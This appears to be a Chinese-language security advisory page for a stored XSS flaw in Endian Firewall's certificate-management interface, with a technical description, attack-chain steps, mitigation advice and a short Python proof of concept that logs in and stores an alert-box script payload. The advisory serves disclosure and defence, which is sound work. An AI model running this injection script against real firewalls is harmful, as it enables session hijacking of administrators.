CVE-2026-34822 CVSS 6.4 中危

CVE-2026-34822 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34822

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本存在存储型跨站脚本（XSS）漏洞。由于`/manage/ca/certificate/`接口的`new_cert_name`参数未经过滤，低权限认证攻击者可注入恶意JavaScript代码。当其他用户访问受影响页面时，恶意脚本将在其浏览器中执行，可能导致会话劫持或敏感信息窃取。

技术细节

该漏洞源于Endian Firewall在证书管理功能中缺乏对用户输入的有效验证。具体而言，在`/manage/ca/certificate/`路径下处理`new_cert_name`参数时，应用程序未对特殊字符进行HTML实体编码或过滤，导致输入被原样存储。攻击者需具备低权限账户，通过构造包含恶意JavaScript代码的HTTP请求，将Payload注入到证书名称字段中。该恶意脚本被持久化存储在服务器端。当具有更高权限的用户（如管理员）浏览受影响的证书管理页面时，服务器将未转义的脚本返回给浏览器，从而触发XSS攻击。攻击者可利用此漏洞窃取管理员Session ID、执行未授权操作或进行钓鱼攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标使用的是易受攻击的Endian Firewall版本（3.3.25或更低版本），并获取一个低权限账户凭据。

STEP 2

漏洞利用

攻击者登录Web管理界面，导航至证书管理页面（/manage/ca/certificate/），并在证书名称参数中插入恶意JavaScript代码。

STEP 3

存储

应用程序将包含恶意脚本的证书名称存储在数据库中，未对输入内容进行适当的清理。

STEP 4

执行

当管理员或其他用户访问证书列表页面时，服务器读取并渲染被污染的数据，导致恶意脚本在受害者的浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "https://<target-endian>/manage/ca/certificate/"
login_url = "https://<target-endian>/login"

# Attacker credentials (Low privilege)
credentials = {
    "username": "low_priv_user",
    "password": "password123"
}

# XSS Payload to be stored
xss_payload = "<script>alert('CVE-2026-34822 - Stored XSS');</script>"

# Data for the certificate creation
payload_data = {
    "new_cert_name": xss_payload,
    # Additional form fields may be required
    "action": "create"
}

session = requests.Session()

# 1. Login
login_response = session.post(login_url, data=credentials)
if login_response.status_code != 200:
    print("Login failed")
    exit()

# 2. Inject Payload
response = session.post(target_url, data=payload_data)

if response.status_code == 200:
    print("Payload injected successfully.")
    print("When an admin views the certificate list, the XSS will trigger.")
else:
    print(f"Injection failed. Status code: {response.status_code}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

在厂商发布补丁前，建议严格限制对证书管理页面的访问权限，仅允许可信的内部IP访问。同时，部署Web应用防火墙（WAF）规则，针对`new_cert_name`参数中的常见XSS特征（如<script>标签、javascript:协议等）进行拦截和过滤。管理员应定期审查系统日志，检测是否存在异常的证书创建行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表